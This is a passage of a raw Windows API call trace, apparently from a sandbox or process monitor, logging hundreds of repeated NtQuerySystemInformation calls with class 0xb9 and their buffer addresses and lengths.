SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd438, Length=0x58, ResultLength=0x0) [0227.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x28, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0227.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0227.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0227.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x20, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd438, Length=0x58, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0227.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0227.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, 